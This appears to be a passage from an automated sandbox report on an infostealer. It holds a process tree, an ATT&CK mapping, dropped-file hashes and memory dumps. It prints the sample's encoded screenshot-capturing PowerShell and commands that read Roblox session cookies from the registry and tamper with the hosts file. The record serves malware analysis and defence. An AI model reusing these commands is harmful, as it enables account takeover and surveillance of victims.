4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      PID:4036
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m1ddlzbj\m1ddlzbj.cmdline"
        5⤵
        
        PID:2468
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB3DF.tmp" "c:\Users\Admin\AppData\Local\Temp\m1ddlzbj\CSC16AADE986B8A4A92AFBD867E4A301FB9.TMP"
        6⤵
        
        PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5060
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      PID:2664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4836
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3412
  - - C:\Windows\SysWOW64\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Views/modifies file attributes
      PID:2032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4936
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4064
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5064
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      PID:1860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:452
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Views/modifies file attributes
      PID:3452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3172
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      PID:3596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3660
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1688
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      PID:3896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3688
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      PID:4784
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2088
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:2216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:3916

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
eedc851ccfb2e8281babb78c2f244c68

SHA1
4df05baf7c1b4f14aad3244aa30e95f234504eaf

SHA256
f8bb083f4072511a1b6c0c2e571a376fb678719fc20890ec96be851d25eaa790

SHA512
643d95f22f271d585f33609fefe30fd17b5b0380613553a86d1e94d5fb602660f2d4b7196915ac5e00f1d17702bbbecf9f4274f5dbb18820745a215b91cbc7ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
58512e9632940f35876d48d476b2c16c

SHA1
5598ca904e4004ad4ad4d65947307e6fb3f23c19

SHA256
ae4db4974e02611cbf20dde8ff9ff0005265bc1fc58a14d9477cf7370f105040

SHA512
35d084a999bda1a860e793d49ae4413017c1485fbdbad25f0d2c5426db60d384a66aee363ca97b79d5a168266438f97fff20bcb59df456bf3cec7ea614279679

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
b1e601962c5779d043dd2ca3d4a58696

SHA1
1ae3222a50df019f7683116cbc81e2a5e3cffc75

SHA256
b656f20d5851ae4f8dcc8d84151e75dfbfed778c1f5c3c97329fc0cfa07b2a8d

SHA512
a818c41cbfb02d441e95ac73508e13001c4a7d29337fbbd878cfb76c0071be54e8496b698b0fd64aba12918ed36e3ee084a0848eeecec7ae760a7e1b73c06415

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
85a595c67242564120c2a2c39d6ad9f1

SHA1
14aa3995e30358d24ba3c79d208d6b24b2e85cd4

SHA256
513c35b366e480f835c80c877803b5ea3f3cfe895793a4f36928b0c3b23d7044

SHA512
e8a6c584a643e11d547eea3e61a77097a6faf6dde7a7830864828a2fed4e571a358aa4c6690a6eb3a4ea4e1f800e0bd3564864d2e23fc99c8dcbab160524b42c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
1716d928f2851d5749dd4d79ef161e44

SHA1
7f04bd401a622898db33f446464909a741afbfaa

SHA256
7c0a1877e4ba81c514f9db45342b13548ce7f378410e5498de5b23fd760c9f15

SHA512
6bb3b52a310bda21aa02828c2dbd7725c14bfc1a402ac6d885a236e04cde62fc0f3455ad08775583552fc7978af3ce28007b4bdaee1424f328a4f53f41981352

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
f4830675c31035643c3b451e47c493ec

SHA1
5c2b91fca4b747775f84893a1475ffaa7c3cdfa7

SHA256
a7bdd126d40a91526d2aa28a79ac23775d8b913003aeeaaa33f3242f8a01ab37

SHA512
634f1a3979877e3ba871b22396068384b735941557ad6fdafd9e1d87b61e4cb224ce093ccaed986bfd2e7b5a2b35f75f0e2ea5daa3348f7e8e4503d0fefbe664

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB3DF.tmp

Filesize
1KB

MD5
93187f0c64d56a39ae5b542506c51bcb

SHA1
e7310e012822b5fb964103cff5a83294c5899c06

SHA256
9dc8c5a3f8d05d3335b34a06c35deaaf51b7e636b79e944cf39e6280efd92816

SHA512
761570d196f2aa0aad7ec69ebf7a9e88cb80021beb93ae2decd9f863ad00a3b0b2779e7973d5910abb099869f29ae55ef670ddfa6dcd65efac778a1873870285

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26762\VCRUNTIME140.dll

Filesize
87KB

MD5
656ffcbfe10e81b64a59f7bfc86581ea

SHA1
765fe7b0bd404cb6fabb1b16372f2e41889f087b

SHA256
e72cb60bc3afaed6f38fa28d7111938067a9e4bed38a36f7a1ac6b9c1f16d0e2

SHA512
c5dfc2991cc382d5f9a03219f3e58c3c51b1baa77972d97548fa89b2c5a37d3eb80b1c7e2dae3e3336d02b755a53d78751f49d60250c4cb6ebcaa7a7756e1a18

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26762\_bz2.pyd

Filesize
44KB

MD5
a5d63dcb9cb38f2e09d31c185dd6d533

SHA1
7c840b640dfc64eb0a211b2ed633cc9606722117

SHA256
16b1069936674b1a133abe5286d52d2bd8297364eeb148052c7363f22a5655ba

SHA512
db5d7d95f03e67e2e6bacf812da443aaf139d83987705583a4e8050cadf18b7f9da4c724970d23fe912cd5ee0f78b0368ffd272a8c04723a9a9e612d59e12d35

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26762\_ctypes.pyd

Filesize
55KB

MD5
03237d39f202c5ca4fdddd24961a1a90

SHA1
1e88f87648bd1a8830a1b9b4deb6de0ad109e8ad

SHA256
2fed29b5ca160ff2616b08ddaa29d4a734624efabdbca3b38b116835ead9c477

SHA512
31270c821dd12ab47352382a5a4f0e5682998edab38f889ed2694ccf0c425cee85fee646ed65f4696038cf4b28b097fd5d0c9134b29b290c0a40e60084292158

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26762\_decimal.pyd

Filesize
91KB

MD5
51ff75f20bd4fdcb56856071ec5ea83b

SHA1
7e758202fd2c09dc93b0ce012a8745003c6bfa29

SHA256
36e74ceda1389e996ff20e31f4d60a445ddb292243345f767d9985415be09b26

SHA512
21224a2c4d40f095b33ac9ad1f6638aa8c1c95e445390cbdc2629fc257d093a94ecaf8f5c45e6647e01c129d13d70ecdbbd23fb88259f5ab4e6c7489a93580d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26762\_hashlib.pyd

Filesize
30KB

MD5
eb544e960f4ead487959f407e4bd5b32

SHA1
e68f7764cfd3878459b20f75b69d63f9c5fc3aef

SHA256
1f64348ea9e57adb5bb4d9ba265eed507af904cae8d668e465811f1820b1cba3

SHA512
e4db5870faf8e1f9bc8668f436bd995795b2d98ebb9f4f9142a99e8d3128065aa6e267bed5bd89862102fc30e3053e1ed9b62e5f4f886d9d6816bfffa96826f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26762\_lzma.pyd

Filesize
78KB

MD5
39dfdfb5e3201fea397b991f42998baa

SHA1
56128be23f53fceddbad37d530383d4a950554b8

SHA256
4273703225de2947059955705f664ebe74ba92e46da51085e127608ac7047d2a

SHA512
b918e34f1ebbbf1f732a168493870b05d34e46e5b9612eaed9d56cd34fe9eab5419145be746968b2f26012559489f1b6313deb5e75fa94c22a0be5fb142ed6c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26762\_queue.pyd

Filesize
25KB

MD5
a73a401c15f5bddefc2351ef1320c3bf

SHA1
7c4db2f8d2e2e8ef01705dc1017ccd81864d94bd

SHA256
f1351c9290f4e6204809a1bc51b4177b580d664359d287ebb28ecb1e7a827601

SHA512
b5f1095bba64a9597f5fab0b7be1f1c12a436b396743cacf872946b6bf047f870a9605ae74c9b1f887c3002ee5c1fb6941e6f9dd5e500c8dcdadb630223aaf73

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26762\_socket.pyd

Filesize
40KB

MD5
ea8ddfb0016172dba4f154c086dcb1be

SHA1
0c6f28c952496c37b3047e6e177dd19d3ffd9c23

SHA256
6625589a1d716c01b26514f78def6652674f2e825276634f600d3627467a5b64

SHA512
9b4e2f1037cd1b24e0531660698673ec0b592be8c62ce66270db967faba7967c30c958ac9d5b7541e9b7c1cb54f10ff83a297fa014dbc7e4b28812f0eeffaec1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26762\_sqlite3.pyd

Filesize
46KB

MD5
96129b49512a7bbaae9708c599bf3595

SHA1
f6586a9e46b9ba5786041162ddf0de33baccc125

SHA256
347d027cae03c4145fb7989dc6ec928267b92c3517fe877dcbcc4fbd5189cf3c

SHA512
933db6a7cd01c8b99e003498765124f0cde7dc78933b638deec58262c7b14771fe331654d379d3a895c1487c9431878f90441cbd239028603a03b42462eb6667

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26762\_ssl.pyd

Filesize
62KB

MD5
dd7e479215b8798b68b8b7d1f0a29e72

SHA1
5abc1bd16c9ab145d4f077d198ac9d76be1001ba

SHA256
c848466b094dbc8915152ec2af51eae16e260dd5e4328ea7191992984e4d112b

SHA512
9e9c15723ab997ebed123936949a3abaf327c37fada3a0464885af9faa5e6aaf8085cf1df8b21bf3c65730e8054177ce9660b318c32d8ec62d6722dc1cc5e5bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26762\base_library.zip

Filesize
1.3MB

MD5
a9cbd0455b46c7d14194d1f18ca8719e

SHA1
e1b0c30bccd9583949c247854f617ac8a14cbac7

SHA256
df6c19637d239bfedc8cd13d20e0938c65e8fdf340622ff334db533f2d30fa19

SHA512
b92468e71490a8800e51410df7068dd8099e78c79a95666ecf274a9e9206359f049490b8f60b96081fafd872ec717e67020364bcfa972f26f0d77a959637e528

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26762\blank.aes

Filesize
114KB

MD5
a1e8292e784f3d8f6946f1ae712de12d

SHA1
3dd3fdb59ad04d91056a1d91c177e76423fbc9fd

SHA256
dbf32b3637676eb87cb4796a0a051d13c93434a5055491e1d6758c9cc12df185

SHA512
3c966cfc645789817405b4e7ca387c9f34da81a5b3a3fb7fe1cc2c03adea74ded0b5a07431dbc4d93ad4ea188760a50f50f83299f2d7870542152f09553f071a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26762\libcrypto-3.dll

Filesize
1.0MB

MD5
d775f7ce016bf7a4d2e019d2fb91cf89

SHA1
a3f71afec1bfac9f4504049074a743bcfe364a43

SHA256
36ab6303ebf188afe771221c08c5e76c95d032b8c2f76adefb6b7e9c74e761d6

SHA512
013380435845bd560e75c123a1997e8a08cabc688572e8380375576dd8c694b552f8ca43d41f6e9d745ce5c72de4e0a5ec5c88fc8f3e385cf5f905badacc23b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26762\libffi-8.dll

Filesize
28KB

MD5
50d1bacecfb4df4b7f4080803cb07e4a

SHA1
e4fd81cc1de13291f5a113f386e831396d6db41d

SHA256
d555fc44125cfa750721ecd47ef64b5e1ecebbe5e94e25ea47c78dd797a94c6f

SHA512
12f9a4989ce535f3907b894589c9df18832c057d58d0674340c80d28171fdd6b2c4a1f0f581083ce4167e51013b913f05b694b370dbc3bfc43a3528814168156

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26762\libssl-3.dll

Filesize
190KB

MD5
e2b1f7d4d43daef0691be6aee6257eb3

SHA1
50c875fd40b57c057244d04334d62b4c9e910f51

SHA256
e063ca6000e51229dde8ee5f7d26158a1daf745dff5081816cfb13000b7f5d9f

SHA512
c510503122479919bc6de4a2de836dc5bf9a4000093d0734feef774607ee44bb3411d98838177b674b1b730c0ee8c5828e29bb83b60cdc65cdfd617ab0a63d6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26762\python313.dll

Filesize
1.5MB

MD5
aa78e8a166f83bd96b4b140e4e1d9da0

SHA1
ffdb720b8fc6e3032258b9963d70bea8fdab1622

SHA256
c5926ed525522f0e411b25121a6f853ce6716f050bd632afbbf93ab2a8787a76

SHA512
14874c64d6b750b85b97d8fc9108dced469c43e93b41106504af0082f230073bd2ac077c636b8c47c5280e36f8c5dcf9dc2bebf9fea361d55e0240dc43a94c99

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26762\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26762\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26762\select.pyd

Filesize
24KB

MD5
507fac498f3725e6a087db5c8b0ebd2f

SHA1
e3080a7d3c7d90fcd3c2d9870e515ae11836b3cc

SHA256
ca1232f1e3fe1ad2cc751e685ef568a2d883637e972bce9d747053e76dff037b

SHA512
ada1561f26939331d5d8d529bd193dcce4bbb8056cd6e9a11da8905aed487db5b00b4bf2472f507600aa249f614f31cc4e5fa622bb8b4e3f98ff35c0effd75bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26762\sqlite3.dll

Filesize
525KB

MD5
2d5bb20dbe3e8a236ba81d5d61633157

SHA1
00bb2a9bb94c709b718a93e0067d124f026fd11b

SHA256
8db91c1fa75fe2d620c747b3341084d7c0b4611b698d4f9f4cb026bcd1459d2e

SHA512
20357af27a906485456da0d3701ce42ebd5ccd6bc82246ea950506e9a0f00e839c42f41c369b9cfd83b9a80bf51522f15d5400a9a586f660fe8fdbf25cb7f94a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26762\unicodedata.pyd

Filesize
255KB

MD5
63b3f2bcecbffaacf34b7903a3fc161b

SHA1
8480c031b9646802803c90489e0bfb25e2b4c310

SHA256
0feeecbbccd3d087fd8b67193dc8f88223e8185d3e6d219caa357d2ae7d460bb

SHA512
ce00945c52332848a7d9e995f93431de935094068cece1ff0ada77182f18da956bd8757948885adfe5cd0958d1d3bc4e2995ed48df6938ec6391170d6a3054d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2qsdywby.5kr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\m1ddlzbj\m1ddlzbj.dll

Filesize
4KB

MD5
56de8a7125d6efa521736c91237e9f95

SHA1
7b5b64689b90ecb9a07f35302504d1cb20e6c76c

SHA256
1972d3dd7ca2e82eda1b2fa993c1be9d1eb9b7e3801e88ed8d8f49396b76d68d

SHA512
7593c366cfa5a9c30340d5b7e994963886ecb1d7e62ffe2e6f6c9510e88710689a5e7e6ec08e3b56843e93ebfa1233e70bf454da2849c0c711aed793b5aba0fa

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\m1ddlzbj\CSC16AADE986B8A4A92AFBD867E4A301FB9.TMP

Filesize
652B

MD5
f28bc5b1850680522f9a6d98389157c2

SHA1
9c38514036401fce4fa2d66505865b4a74b84c2d

SHA256
0bd4ff6e2aaecde45fc303afaad0f36f1c13fb31fd5e040c1f0fc6fd4a48929e

SHA512
904a08f8da3d37f3af31169e8ac331d140595f9da1c5194a8eacf19ae2dc6eca1dfda54e58c62201b9c08d8a6a789ee6e1cc87259634ae4de0869d3e7e657e7c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\m1ddlzbj\m1ddlzbj.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\m1ddlzbj\m1ddlzbj.cmdline

Filesize
607B

MD5
66e5c430936bc37ea9bfc7f03c48058a

SHA1
4934631422a7ff261910a1cae399da4e042a485d

SHA256
19ab0f45b3698ef7b60e64caf037f6f5d4ec9701e2cde53716a33fc8d9cb562c

SHA512
7e9a6d44f2972142e3695464e6b80035efbe6549a0439f34476f810abf44229e0a1704653fd4ed00f46ba0cf9cfa5e39ed0c6a081e69e89c827230e50c37d624

Download Submit
memory/776-267-0x00000000072F0000-0x0000000007393000-memory.dmp

Filesize
652KB

Download
memory/776-288-0x0000000007A90000-0x000000000810A000-memory.dmp

Filesize
6.5MB

Download
memory/776-266-0x00000000066B0000-0x00000000066CE000-memory.dmp

Filesize
120KB

Download
memory/776-86-0x00000000739FE000-0x00000000739FF000-memory.dmp

Filesize
4KB

Download
memory/776-255-0x00000000066F0000-0x0000000006722000-memory.dmp

Filesize
200KB

Download
memory/776-256-0x000000006EEB0000-0x000000006EEFC000-memory.dmp

Filesize
304KB

Download
memory/776-193-0x00000000064A0000-0x00000000064EC000-memory.dmp

Filesize
304KB

Download
memory/776-192-0x0000000006120000-0x000000000613E000-memory.dmp

Filesize
120KB

Download
memory/776-97-0x0000000005B20000-0x0000000005E74000-memory.dmp

Filesize
3.3MB

Download
memory/1460-295-0x0000000007310000-0x00000000078B4000-memory.dmp

Filesize
5.6MB

Download
memory/1460-291-0x0000000006CC0000-0x0000000006D56000-memory.dmp

Filesize
600KB

Download
memory/1460-292-0x0000000006210000-0x0000000006232000-memory.dmp

Filesize
136KB

Download
memory/1460-296-0x0000000006D60000-0x0000000006DF2000-memory.dmp

Filesize
584KB

Download
memory/3416-88-0x0000000004EF0000-0x0000000005518000-memory.dmp

Filesize
6.2MB

Download
memory/3416-268-0x000000006EEB0000-0x000000006EEFC000-memory.dmp

Filesize
304KB

Download
memory/3416-91-0x0000000005610000-0x0000000005676000-memory.dmp

Filesize
408KB

Download
memory/3416-89-0x0000000004CA0000-0x0000000004CC2000-memory.dmp

Filesize
136KB

Download
memory/3416-87-0x0000000002370000-0x00000000023A6000-memory.dmp

Filesize
216KB

Download
memory/3416-301-0x0000000007180000-0x0000000007191000-memory.dmp

Filesize
68KB

Download
memory/3416-90-0x0000000004E40000-0x0000000004EA6000-memory.dmp

Filesize
408KB

Download
memory/3416-290-0x0000000006FF0000-0x0000000006FFA000-memory.dmp

Filesize
40KB

Download
memory/3416-289-0x0000000006F80000-0x0000000006F9A000-memory.dmp

Filesize
104KB

Download
memory/3504-74-0x0000000074520000-0x00000000748B4000-memory.dmp

Filesize
3.6MB

Download
memory/3504-66-0x0000000074970000-0x000000007499F000-memory.dmp

Filesize
188KB

Download
memory/3504-25-0x0000000074C30000-0x00000000751C2000-memory.dmp

Filesize
5.6MB

Download
memory/3504-71-0x0000000074BD0000-0x0000000074BF2000-memory.dmp

Filesize
136KB

Download
memory/3504-83-0x00000000743E0000-0x000000007448E000-memory.dmp

Filesize
696KB

Download
memory/3504-85-0x0000000074A10000-0x0000000074B4F000-memory.dmp

Filesize
1.2MB

Download
memory/3504-76-0x00000000744A0000-0x00000000744B1000-memory.dmp

Filesize
68KB

Download
memory/3504-293-0x00000000748C0000-0x0000000074968000-memory.dmp

Filesize
672KB

Download
memory/3504-294-0x0000000004090000-0x0000000004424000-memory.dmp

Filesize
3.6MB

Download
memory/3504-78-0x0000000074490000-0x000000007449C000-memory.dmp

Filesize
48KB

Download
memory/3504-84-0x0000000074B50000-0x0000000074B6F000-memory.dmp

Filesize
124KB

Download
memory/3504-73-0x0000000004090000-0x0000000004424000-memory.dmp

Filesize
3.6MB

Download
memory/3504-72-0x00000000748C0000-0x0000000074968000-memory.dmp

Filesize
672KB

Download
memory/3504-254-0x0000000074970000-0x000000007499F000-memory.dmp

Filesize
188KB

Download
memory/3504-65-0x00000000749A0000-0x00000000749AC000-memory.dmp

Filesize
48KB

Download
memory/3504-70-0x0000000074C30000-0x00000000751C2000-memory.dmp

Filesize
5.6MB

Download
memory/3504-316-0x0000000074520000-0x00000000748B4000-memory.dmp

Filesize
3.6MB

Download
memory/3504-62-0x00000000749F0000-0x0000000074A05000-memory.dmp

Filesize
84KB

Download
memory/3504-48-0x0000000074BC0000-0x0000000074BCD000-memory.dmp

Filesize
52KB

Download
memory/3504-47-0x0000000074BD0000-0x0000000074BF2000-memory.dmp

Filesize
136KB

Download
memory/3504-60-0x0000000074A10000-0x0000000074B4F000-memory.dmp

Filesize
1.2MB

Download
memory/3504-54-0x0000000074B90000-0x0000000074BB7000-memory.dmp

Filesize
156KB

Download
memory/3504-58-0x0000000074B50000-0x0000000074B6F000-memory.dmp

Filesize
124KB

Download
memory/3504-56-0x0000000074B70000-0x0000000074B88000-memory.dmp

Filesize
96KB

Download
memory/4036-329-0x0000000004C10000-0x0000000004C18000-memory.dmp

Filesize
32KB

Download
memory/4944-327-0x0000000007830000-0x0000000007838000-memory.dmp

Filesize
32KB

Download
memory/4944-324-0x0000000007850000-0x000000000786A000-memory.dmp

Filesize
104KB

Download
memory/4944-321-0x0000000007750000-0x0000000007764000-memory.dmp

Filesize
80KB

Download
memory/4944-318-0x0000000007740000-0x000000000774E000-memory.dmp

Filesize
56KB

Download
memory/4944-278-0x000000006EEB0000-0x000000006EEFC000-memory.dmp

Filesize
304KB

Download